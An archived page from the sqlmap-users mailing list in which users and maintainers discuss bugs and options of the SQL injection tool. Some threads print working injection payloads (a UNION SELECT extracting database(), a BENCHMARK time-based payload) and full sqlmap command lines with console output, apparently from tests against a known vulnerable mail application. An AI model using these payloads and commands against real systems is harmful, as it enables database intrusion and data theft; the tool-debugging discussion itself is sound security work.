sqlmap-users Mailing List for sqlmap (Page 15)
Brought to you by: inquisb
From: a d. <deh...@gm...> - 2015-02-04 15:40:12

This searches in one table. How to tell SQL to search in all tables (except by writing out all the tables one by one)?
From: Brandon P. <bpe...@gm...> - 2015-02-04 15:36:50

You would be better off finding the most likely column to contain that value, then select from table where column = 'value'.

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: a d. <deh...@gm...> - 2015-02-04 15:35:21

Yes, I think that's the way. How may I search based on column value in all tables, all columns?

On Wed, Feb 4, 2015 at 6:53 PM, is2reg <is...@16...> wrote:
> try --sql-shell
>
> 2015-02-04
> is2reg
>
> From: a dehqan <deh...@gm...>
> Sent: 2015-02-04 23:20
> Subject: Re: [sqlmap-users] Search based on fileds value
> To: "Brandon Perry" <bpe...@gm...>
> Cc: ", sqlmap-users" <sql...@li...>, "Raymond" <ra...@te...>
From: Brandon P. <bpe...@gm...> - 2015-02-04 15:24:28

--search requires -C, -T, or -D; it doesn't take an argument as far as I know. --search will search for a table with LIKE, or explicitly for one called "fdsa" if -T fdsa is specified.
From: Miroslav S. <mir...@gm...> - 2015-02-04 15:23:12

There is no way to do it from sqlmap's side. You can use grep as Brandon mentioned.

Bye

--
Miroslav Stampar
http://about.me/stamparm
From: Marcell F. <fod...@gm...> - 2015-02-04 15:22:54

--search "asd"
From: a d. <deh...@gm...> - 2015-02-04 15:20:57

Thanks.

You mean first dump all databases and then search in the files? If yes, I need a way without dumping all databases, because the database is huge, of course: about 40 databases.

And may I use --thread or any other option to make it faster?
From: Brandon P. <bpe...@gm...> - 2015-02-04 15:15:25

--dump then grep?
From: a d. <deh...@gm...> - 2015-02-04 15:11:29

Hi

Guys, is there any way to search based on field values in sqlmap?

For example, how to search in all databases for a column with the value 1232434345?

Regards
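The "--dump then grep" route suggested in this thread loses the database/table/column context that a plain grep over the dump directory throws away. The following is an added example, not sqlmap's own code: it walks a dump tree laid out the way sqlmap writes its CSV dumps (assumed here as <root>/<db>/<table>.csv with a header row, which is what sqlmap puts under output/<host>/dump/) and reports every cell that matches the value being looked for. The sample tree and its rows are constructed inline in a temporary directory.

```python
import csv
import os
import tempfile
from typing import List, NamedTuple


class Hit(NamedTuple):
    """One matching cell, located by database, table, column and data row."""
    database: str
    table: str
    column: str
    row: int  # 1-based data row number; the CSV header row is not counted


def search_dump(root: str, needle: str, substring: bool = False) -> List[Hit]:
    """Walk <root>/<db>/<table>.csv and return every cell matching needle.

    Exact comparison by default; substring=True also finds the value when it
    is embedded in free text (e.g. a notes column), which a SQL equality
    search on one column would miss.
    """
    hits: List[Hit] = []
    for db in sorted(os.listdir(root)):
        db_dir = os.path.join(root, db)
        if not os.path.isdir(db_dir):
            continue
        for fname in sorted(os.listdir(db_dir)):
            if not fname.endswith(".csv"):
                continue
            table = fname[:-len(".csv")]
            with open(os.path.join(db_dir, fname), newline="", encoding="utf-8",
                      errors="replace") as fh:
                reader = csv.reader(fh)
                header = next(reader, None)  # first row holds the column names
                if header is None:
                    continue  # empty table file
                for rownum, row in enumerate(reader, start=1):
                    for column, cell in zip(header, row):
                        matched = needle in cell if substring else cell == needle
                        if matched:
                            hits.append(Hit(db, table, column, rownum))
    return hits


def build_sample_dump() -> str:
    """Construct a tiny dump tree (constructed data, not from any real target)."""
    root = tempfile.mkdtemp(prefix="dump-")
    tables = {
        ("shop", "orders"): (["id", "customer_ref", "total"],
                             [["1", "1232434345", "19.99"], ["2", "555", "3.50"]]),
        ("shop", "customers"): (["id", "phone"],
                                [["7", "1232434345"]]),
        ("crm", "notes"): (["id", "body"],
                           [["1", "ref 1232434345 called back"]]),
    }
    for (db, table), (header, rows) in tables.items():
        os.makedirs(os.path.join(root, db), exist_ok=True)
        path = os.path.join(root, db, table + ".csv")
        with open(path, "w", newline="", encoding="utf-8") as fh:
            writer = csv.writer(fh)
            writer.writerow(header)
            writer.writerows(rows)
    return root


if __name__ == "__main__":
    dump_root = build_sample_dump()
    for hit in search_dump(dump_root, "1232434345", substring=True):
        print("%s.%s.%s (row %d)" % hit)
```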
From: Brandon P. <bpe...@gm...> - 2015-02-02 21:23:20

Works like a charm, man. Thanks a bunch. :)
From: Brandon P. <bpe...@gm...> - 2015-02-02 21:17:15

Trying now.
From: Miroslav S. <mir...@gm...> - 2015-02-02 21:08:02

Fixed. Please update to the latest revision to have it patched.

Bye
From: Brandon P. <bpe...@gm...> - 2015-02-02 20:46:02

I think it has to do with Accept specifically.

Passing --headers="X-Forwarded-For:192.168.1.31\nAccept:application/json" results in the X-Forwarded-For header being present, but Accept is still text/html.

I am using --data as well, so it is a POST.

This is an application I am working on privately in my free time, so I am willing to send any traffic information/commands off list.
From: Brandon P. <bpe...@gm...> - 2015-02-02 20:30:11

Ah! Let me try.
From: Miroslav S. <mir...@gm...> - 2015-02-02 20:29:37
--headers='Accept: application/json' is wrongly handled by Python :)

For some strange reason, it messes the sys.argv when there is a whitespace
inside a single-quote formation:

python -c "import sys; print sys.argv" --dummy="foo: bar"
['-c', '--dummy=foo: bar']

python -c "import sys; print sys.argv" --dummy='foo: bar'
['-c', "--dummy='foo:", "bar'"]

Bye

On Mon, Feb 2, 2015 at 6:33 PM, Miroslav Stampar <mir...@gm...> wrote:
> I'll take a look in a couple of hours and let you know.
>
> Bye
> On Feb 1, 2015 4:27 PM, "Brandon Perry" <bpe...@gm...> wrote:
>
>> Hello!
>>
>> I am attempting to override the Accept header with Accept:
>> application/json (currently it is text/html).
>>
>> When I use -r, I don't have a problem, but I want to specify a single
>> command instead of command + request to reproduce. Using --headers='Accept:
>> application/json' doesn't override the default Accept: text/html. Is this
>> intended behavior?
>>
>> Thanks
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website

--
Miroslav Stampar
http://about.me/stamparm
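Added example (not from this thread and not sqlmap's own code): the two command lines above, split once with POSIX shell rules (shlex) and once with the Microsoft C runtime's argv rules, where only double quotes group words and a single quote is an ordinary character. The assumption, not stated in the thread, is that the surprising sys.argv came from a splitter of the second kind; the constructed helper python_c_sys_argv only models how `python -c` reports its arguments.

```python
"""Command-line tokenization demo (added example; not part of sqlmap).

Two rule sets are applied to the same command line:
  * POSIX shell (shlex): '...' and "..." both group words, quotes are removed.
  * Microsoft C runtime: only "..." groups words, so --dummy='foo: bar'
    is cut at the space and the single quotes survive into argv.
Assumption: the thread's odd result came from a splitter of the second kind.
"""
import shlex

# The two command lines quoted in the thread, without the leading "python".
CMD_DOUBLE = '-c "import sys; print sys.argv" --dummy="foo: bar"'
CMD_SINGLE = '-c "import sys; print sys.argv" --dummy=\'foo: bar\''


def split_posix(cmdline):
    """Tokenize the way a POSIX shell does before exec()."""
    return shlex.split(cmdline)


def split_msvcrt(cmdline):
    """Tokenize the way the Microsoft C runtime builds argv.

    Rules implemented (the classic documented ones):
      - whitespace separates arguments unless inside double quotes
      - a double quote toggles quoted mode and is removed
      - 2n backslashes before a quote -> n backslashes, quote is a delimiter
      - 2n+1 backslashes before a quote -> n backslashes plus a literal quote
      - backslashes not followed by a quote are literal
    """
    args, cur = [], []
    in_quotes = have_arg = False
    i, n = 0, len(cmdline)
    while i < n:
        c = cmdline[i]
        if c == '\\':
            j = i
            while j < n and cmdline[j] == '\\':
                j += 1
            count = j - i
            if j < n and cmdline[j] == '"':
                cur.append('\\' * (count // 2))
                if count % 2:            # odd run: the quote is escaped
                    cur.append('"')
                    j += 1
                # even run: the quote is handled on the next iteration
            else:
                cur.append('\\' * count)
            have_arg, i = True, j
        elif c == '"':
            in_quotes = not in_quotes
            have_arg, i = True, i + 1
        elif c in ' \t' and not in_quotes:
            if have_arg:
                args.append(''.join(cur))
                cur, have_arg = [], False
            i += 1
        else:
            cur.append(c)
            have_arg, i = True, i + 1
    if have_arg:
        args.append(''.join(cur))
    return args


def python_c_sys_argv(tokens):
    """Model of what `python -c CODE ...` reports as sys.argv.

    Python consumes the code string itself; sys.argv[0] is the literal '-c'
    and the remaining tokens follow unchanged.
    """
    if len(tokens) < 2 or tokens[0] != '-c':
        raise ValueError("expected a 'python -c CODE ...' token list")
    return ['-c'] + tokens[2:]


def compare(cmdline):
    """Return (posix_argv, msvcrt_argv) as `python -c` would report them."""
    return (python_c_sys_argv(split_posix(cmdline)),
            python_c_sys_argv(split_msvcrt(cmdline)))


if __name__ == '__main__':
    for label, cmd in (('double quotes', CMD_DOUBLE),
                       ('single quotes', CMD_SINGLE)):
        posix, win = compare(cmd)
        print('%s\n  POSIX : %r\n  MSVCRT: %r' % (label, posix, win))
```

On a splitter of the second kind the portable way to pass a header value containing a space is the double-quoted form.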
From: Miroslav S. <mir...@gm...> - 2015-02-02 17:33:46
I'll take a look in a couple of hours and let you know.

Bye
On Feb 1, 2015 4:27 PM, "Brandon Perry" <bpe...@gm...> wrote:
> Hello!
>
> I am attempting to override the Accept header with Accept:
> application/json (currently it is text/html).
>
> When I use -r, I don't have a problem, but I want to specify a single
> command instead of command + request to reproduce. Using --headers='Accept:
> application/json' doesn't override the default Accept: text/html. Is this
> intended behavior?
>
> Thanks
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
From: Brandon P. <bpe...@gm...> - 2015-02-01 15:26:39
Hello!

I am attempting to override the Accept header with Accept: application/json (currently it is text/html).

When I use -r, I don't have a problem, but I want to specify a single command instead of command + request to reproduce. Using --headers='Accept: application/json' doesn't override the default Accept: text/html. Is this intended behavior?

Thanks

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
From: sad f. <sad...@ma...> - 2015-01-29 09:23:37
Hi!
Thanks for the greatest tool!
I've found a problem in the latest revision of sqlmap.
If you run something like:

sqlmap.py -u "http://www.google.com/news.php?id=5+OR+(4=4)" --skip-urlencode --random-agent --tamper=space2plus --technique=BSU -v 3 --dbms=mssql

And answer 'y' here:

[09:16:17] [WARNING] it appears that you have provided tainted parameter values ('id=5 OR (4=4)') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N]

You'll get some output encoding problem:

[Gw:bM:bw] [dLf4Q] ScuX1KRmE PXuhmWgc 'BBB.EXXE1c.jXg'
[Gw:bM:NG] [T830] hcuhRmE jXmmcjhRXm hX hPc hWSEch 4yt
[Gw:bM:Nb] [dLf4Q] icj1WSci BcA sWEc jPWSuch '9hI-2'
[Gw:bM:Nb] [dLf4Q] EXh Hppo cSSXS jXic: FGG (fWi ycx9cuh)
[Gw:bM:Nb] [Zry8T8Q] hPc BcA ucSKcS ScusXmici BRhP Wm Hppo cSSXS jXic (FGG) BPRjP jX91i RmhcSIcSc BRhP hPc Scu91hu XI hPc hcuhu

Printscreen attached.
In older versions (tested on something like the November 2014 version) there is no such problem.

And also:
The checkWAF() function is now called every time you run sqlmap. But you really don't need that. Because of this, in case there is a WAF you'll get a timeout every time you run sqlmap on the same target, or may even get an IP ban.
I think the old variant with the --check-waf option is much better.

Thank you!
From: Miroslav S. <mir...@gm...> - 2015-01-08 08:01:55
Hi.

Sorry, this went to my spam folder :). Thank you for your report. It should be fixed now (there was indeed a bug involved).

Bye

On Tue, Dec 30, 2014 at 2:26 PM, John Public <jn...@gm...> wrote:
>
> Has anyone had success using the sqlmap direct connection with an mssql db
> recently? It either seems to be broken or I am doing it wrong. Any
> suggestions would be greatly appreciated.
>
> E.g.
>
> ~/sqlmapproject-sqlmap-4f602da# python sqlmap.py -d "mssql://sa:weakpassword@192.168.1.133:1433/demo" -v 3 --os=Windows --dbms=mssql --dbs
>
> {1.0-dev-nongit-20141230}
>
> [00:06:22] [DEBUG] cleaning up configuration parameters
> [00:06:22] [DEBUG] forcing back-end DBMS operating system to user defined value 'Windows'
> [00:06:22] [DEBUG] skipping test for Microsoft SQL Server
> [00:06:22] [DEBUG] skipping test for MySQL
> [00:06:22] [DEBUG] skipping test for Oracle
> [00:06:22] [DEBUG] skipping test for PostgreSQL
> [00:06:22] [DEBUG] skipping test for SQLite
> [00:06:22] [DEBUG] skipping test for Microsoft Access
> [00:06:22] [DEBUG] skipping test for Firebird
> [00:06:22] [DEBUG] skipping test for SAP MaxDB
> [00:06:22] [DEBUG] skipping test for Sybase
> [00:06:22] [DEBUG] skipping test for IBM DB2
> [00:06:22] [DEBUG] skipping test for HSQLDB
> [00:06:22] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system. Support for this DBMS will be implemented at some point
>
>
> --
> jnqpblc

--
Miroslav Stampar
http://about.me/stamparm
From: John P. <jn...@gm...> - 2014-12-30 13:26:10
Has anyone had success using the sqlmap direct connection with an mssql db recently? It either seems to be broken or I am doing it wrong. Any suggestions would be greatly appreciated.

E.g.

~/sqlmapproject-sqlmap-4f602da# python sqlmap.py -d "mssql://sa:weakpassword@192.168.1.133:1433/demo" -v 3 --os=Windows --dbms=mssql --dbs

{1.0-dev-nongit-20141230}

[00:06:22] [DEBUG] cleaning up configuration parameters
[00:06:22] [DEBUG] forcing back-end DBMS operating system to user defined value 'Windows'
[00:06:22] [DEBUG] skipping test for Microsoft SQL Server
[00:06:22] [DEBUG] skipping test for MySQL
[00:06:22] [DEBUG] skipping test for Oracle
[00:06:22] [DEBUG] skipping test for PostgreSQL
[00:06:22] [DEBUG] skipping test for SQLite
[00:06:22] [DEBUG] skipping test for Microsoft Access
[00:06:22] [DEBUG] skipping test for Firebird
[00:06:22] [DEBUG] skipping test for SAP MaxDB
[00:06:22] [DEBUG] skipping test for Sybase
[00:06:22] [DEBUG] skipping test for IBM DB2
[00:06:22] [DEBUG] skipping test for HSQLDB
[00:06:22] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system. Support for this DBMS will be implemented at some point

--
jnqpblc
From: is2reg<is...@16...> - 2014-12-29 18:05:23
thank you, I will try again.

2014-12-30
is2reg

From: Brandon Perry <bpe...@gm...>
Sent: 2014-12-29 06:39
Subject: Re: [sqlmap-users] I want to use custom payload, but I don't know DIY
To: "is2reg"<is...@16...>
Cc: "SqlMap List"<sql...@li...>

Could try --prefix="where " although %23 is a hex encoded #.

On Dec 28, 2014, at 12:07 PM, is2reg <is...@16...> wrote:

Hi,
the payload is :
%20where%201=2%20UNION%20SELECT%201,2,3,4,5,database(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23

Can't replace "where" with "and", and can't replace "%23" with "#", otherwise the result is incorrect. How can I use this payload with sqlmap ?
Thanks !

2014-12-29
is2reg
From: Brandon P. <bpe...@gm...> - 2014-12-28 23:35:07
Could try --prefix="where " although %23 is a hex encoded #.

> On Dec 28, 2014, at 12:07 PM, is2reg <is...@16...> wrote:
>
> Hi,
> the payload is :
> %20where%201=2%20UNION%20SELECT%201,2,3,4,5,database(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23
>
> Can't replace "where" with "and", and can't replace "%23" with "#", otherwise the result is incorrect. How can I use this payload with sqlmap ?
> Thanks !
>
> 2014-12-29
> is2reg
From: Brandon P. <bpe...@gm...> - 2014-12-15 21:23:11
Yeah, no worries. Was just playing around with it and was surprised sqlmap didn't find the UNION. I think what is happening is sqlmap is changing up the value of tray during the union tests to negative numbers, and it is required to be 'in_deleted' (but hey, that's what --prefix is for).

Thanks!

On Mon, Dec 15, 2014 at 2:39 PM, Miroslav Stampar <mir...@gm...> wrote:
>
> Looking into the traffic file I don't see "obvious" trails of SQLi. If you are
> satisfied with your findings I won't look any further.
>
> Bye
>
> On Mon, Dec 15, 2014 at 6:55 PM, Brandon Perry <bpe...@gm...> wrote:
>>
>> Aha, I got it:
>>
>> bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt --proxy=http://127.0.0.1:8080 --technique=u --suffix=" LIMIT 1,1#" --prefix='in_deleted ' --level=5 --risk=3 -o
>>     _
>>  ___ ___| |_____ ___ ___  {1.0-dev-180ede0}
>> |_ -| . | |     | .'| . |
>> |___|_  |_|_|_|_|__,|  _|
>>       |_|           |_|   http://sqlmap.org
>>
>> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
>>
>> [*] starting at 09:54:50
>>
>> [09:54:50] [INFO] parsing HTTP request from '/tmp/req.req'
>> [09:54:50] [INFO] setting file for logging HTTP traffic
>> [09:54:50] [WARNING] persistent HTTP(s) connections, Keep-Alive, has been disabled because of its incompatibility with HTTP(s) proxy
>> [09:54:50] [INFO] testing connection to the target URL
>> [09:54:50] [INFO] heuristics detected web page charset 'ascii'
>> [09:54:50] [WARNING] heuristic (basic) test shows that POST parameter 'tray' might not be injectable
>> [09:54:50] [INFO] testing for SQL injection on POST parameter 'tray'
>> [09:54:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
>> [09:54:51] [WARNING] reflective value(s) found and filtering out
>> [09:54:51] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
>> [09:54:51] [INFO] target URL appears to be UNION injectable with 1 columns
>> [09:54:51] [INFO] POST parameter 'tray' is 'MySQL UNION query (random number) - 1 to 10 columns' injectable
>> POST parameter 'tray' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
>> sqlmap identified the following injection points with a total of 26 HTTP(s) requests:
>> ---
>> Parameter: tray (POST)
>>     Type: UNION query
>>     Title: MySQL UNION query (random number) - 1 column
>>     Payload: action=getMailMessage&tray=in_deleted UNION ALL SELECT CONCAT(0x71786b7171,0x756a6c48694a6a504545,0x71767a6a71) LIMIT 1,1#&mid=1
>> ---
>> [09:55:02] [INFO] testing MySQL
>> [09:55:02] [INFO] confirming MySQL
>> [09:55:03] [INFO] the back-end DBMS is MySQL
>> web server operating system: Linux Ubuntu
>> web application technology: Apache 2.4.7, PHP 5.5.9
>> back-end DBMS: MySQL >= 5.0.0
>> [09:55:03] [INFO] fetched data logged to text files under '/home/bperry/.sqlmap/output/172.31.16.26'
>>
>> [*] shutting down at 09:55:03
>>
>> bperry@ubuntu:~/tools/sqlmap$
>>
>>
>> On Mon, Dec 15, 2014 at 11:46 AM, Brandon Perry <bpe...@gm...> wrote:
>>>
>>> Sorry, one more thing to note, the following command gets very close to exploiting the injection:
>>>
>>> ./sqlmap.py -r /tmp/req.req -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt --proxy=http://127.0.0.1:8080 --technique=u --suffix=" LIMIT 1,1#" --union-char=f --prefix='in_deleted '
>>>
>>> The only problem is that the union-char is 'f', when I was hoping it would be 0x66. When I capture the request and replace 'f' with 0x66, the injection works. Looks like ' is a bad char.
>>>
>>> On Mon, Dec 15, 2014 at 11:29 AM, Brandon Perry <bpe...@gm...> wrote:
>>>>
>>>> Playing with the queries sqlmap sends a bit more:
>>>>
>>>> action=getMailMessage&tray=in_deleted UNION ALL SELECT NULL#&mid=1
>>>>
>>>> This results in a 0 being returned where the password hash was in the successful injection:
>>>>
>>>> 1[split]0[split]in_deleted UNION ALL SELECT NULL#[split]
>>>>         ^ injection result
>>>>
>>>>
>>>> action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361#&mid=1
>>>>
>>>> This payload also results in a 0 being returned, not 'fdsa' as you would expect.
>>>>
>>>> However, this payload does return 'fdsa'
>>>>
>>>> action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361 LIMIT 1,1#&mid=1
>>>>
>>>> 1[split]fdsa[split]in_deleted UNION ALL SELECT 0x66647361 LIMIT 1,1#[split]
>>>>
>>>>
>>>> Hope this helps.
>>>>
>>>>
>>>> On Mon, Dec 15, 2014 at 11:01 AM, Brandon Perry <bpe...@gm...> wrote:
>>>>>
>>>>> Here is the console output. Attached is the traffic log in a zip:
>>>>>
>>>>> bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --level=5 --risk=3 -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt
>>>>>     _
>>>>>  ___ ___| |_____ ___ ___  {1.0-dev-180ede0}
>>>>> |_ -| . | |     | .'| . |
>>>>> |___|_  |_|_|_|_|__,|  _|
>>>>>       |_|           |_|   http://sqlmap.org
>>>>>
>>>>> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
>>>>>
>>>>> [*] starting at 08:56:27
>>>>>
>>>>> [08:56:27] [INFO] parsing HTTP request from '/tmp/req.req'
>>>>> [08:56:27] [INFO] setting file for logging HTTP traffic
>>>>> [08:56:27] [INFO] flushing session file
>>>>> [08:56:27] [INFO] testing connection to the target URL
>>>>> [08:56:27] [INFO] heuristics detected web page charset 'ascii'
>>>>> [08:56:27] [INFO] testing if the target URL is stable. This can take a couple of seconds
>>>>> [08:56:28] [INFO] target URL is stable
>>>>> [08:56:28] [WARNING] heuristic (basic) test shows that POST parameter 'tray' might not be injectable
>>>>> [08:56:28] [INFO] testing for SQL injection on POST parameter 'tray'
>>>>> [08:56:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
>>>>> [08:56:28] [WARNING] reflective value(s) found and filtering out
>>>>> [08:56:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
>>>>> [08:56:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
>>>>> [08:56:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
>>>>> [08:57:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
>>>>> [08:57:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)'
>>>>> [08:57:18] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'
>>>>> [08:57:28] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
>>>>> [08:57:28] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
>>>>> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
>>>>> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
>>>>> [08:57:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
>>>>> [08:57:29] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
>>>>> [08:57:29] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
>>>>> [08:57:30] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'
>>>>> [08:57:30] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
>>>>> [08:57:31] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
>>>>> [08:57:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
>>>>> [08:57:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
>>>>> [08:57:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
>>>>> [08:57:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
>>>>> [08:57:45] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
>>>>> [08:57:48] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
>>>>> [08:57:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
>>>>> [08:57:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
>>>>> [08:57:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
>>>>> [08:58:01] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
>>>>> [08:58:04] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - GROUP BY and ORDER BY clauses (BIGINT UNSIGNED)'
>>>>> [08:58:08] [INFO] testing 'MySQL inline queries'
>>>>> [08:58:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>>>>> [08:58:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
>>>>> [08:58:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>>>>> [08:58:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
>>>>> [08:58:22] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
>>>>> [08:58:26] [INFO] POST parameter 'tray' seems to be 'MySQL < 5.0.12 AND time-based blind (heavy query)' injectable
>>>>> [08:58:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
>>>>> [08:58:26] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
>>>>> [08:58:28] [INFO] target URL appears to be UNION injectable with 1 columns
>>>>> [08:58:28] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
>>>>> [08:58:29] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
>>>>> [08:58:31] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
>>>>> [08:58:32] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
>>>>> [08:58:33] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
>>>>> [08:58:35] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
>>>>> [08:58:36] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
>>>>> [08:58:38] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
>>>>> [08:58:39] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns'
>>>>> [08:58:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
>>>>> [08:58:42] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
>>>>> [08:58:44] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
>>>>> [08:58:45] [INFO] testing 'Generic UNION query (random number) - 22 to 40 columns'
>>>>> [08:58:46] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns'
>>>>> [08:58:48] [INFO] testing 'Generic UNION query (random number) - 42 to 60 columns'
>>>>> [08:58:49] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns'
>>>>> [08:58:50] [INFO] testing 'Generic UNION query (random number) - 62 to 80 columns'
>>>>> [08:58:52] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 columns'
>>>>> [08:58:53] [INFO] testing 'Generic UNION query (random number) - 82 to 100 columns'
>>>>> [08:58:54] [INFO] checking if the injection point on POST parameter 'tray' is a false positive
>>>>> POST parameter 'tray' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
>>>>> sqlmap identified the following injection points with a total of 2049 HTTP(s) requests:
>>>>> ---
>>>>> Parameter: tray (POST)
>>>>>     Type: AND/OR time-based blind
>>>>>     Title: MySQL < 5.0.12 AND time-based blind (heavy query)
>>>>>     Payload: action=getMailMessage&tray=in_deleted AND 9095=BENCHMARK(5000000,MD5(0x6e434246))-- QPnA&mid=1
>>>>> ---
>>>>> [08:59:48] [INFO] testing MySQL
>>>>> [08:59:48] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
>>>>> do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
>>>>> [08:59:51] [INFO] confirming MySQL
>>>>> [08:59:53] [INFO] adjusting time delay to 1 second due to good response times
>>>>> [08:59:53] [INFO] the back-end DBMS is MySQL
>>>>> web server operating system: Linux Ubuntu
>>>>> web application technology: Apache 2.4.7, PHP 5.5.9
>>>>> back-end DBMS: MySQL >= 5.0.0
>>>>> [08:59:53] [INFO] fetched data logged to text files under '/home/bperry/.sqlmap/output/172.31.16.26'
>>>>>
>>>>> [*] shutting down at 08:59:53
>>>>>
>>>>> bperry@ubuntu:~/tools/sqlmap$
>>>>>
>>>>> On Mon, Dec 15, 2014 at 10:54 AM, Miroslav Stampar <mir...@gm...> wrote:
>>>>>>
>>>>>> Hi.
>>>>>>
>>>>>> I don't see a reason why this form of UNION test would be any different than the regular one used by sqlmap. Can you please send me the traffic file for such a run (... --flush-session -t traffic.txt) along with the console output?
>>>>>>
>>>>>> Bye
>>>>>> On Dec 15, 2014 5:50 PM, "Brandon Perry" <bpe...@gm...> wrote:
>>>>>>
>>>>>>> Hello!
>>>>>>>
>>>>>>> Playing around with the following vulnerability:
>>>>>>>
>>>>>>> http://www.exploit-db.com/exploits/35505/
>>>>>>>
>>>>>>>
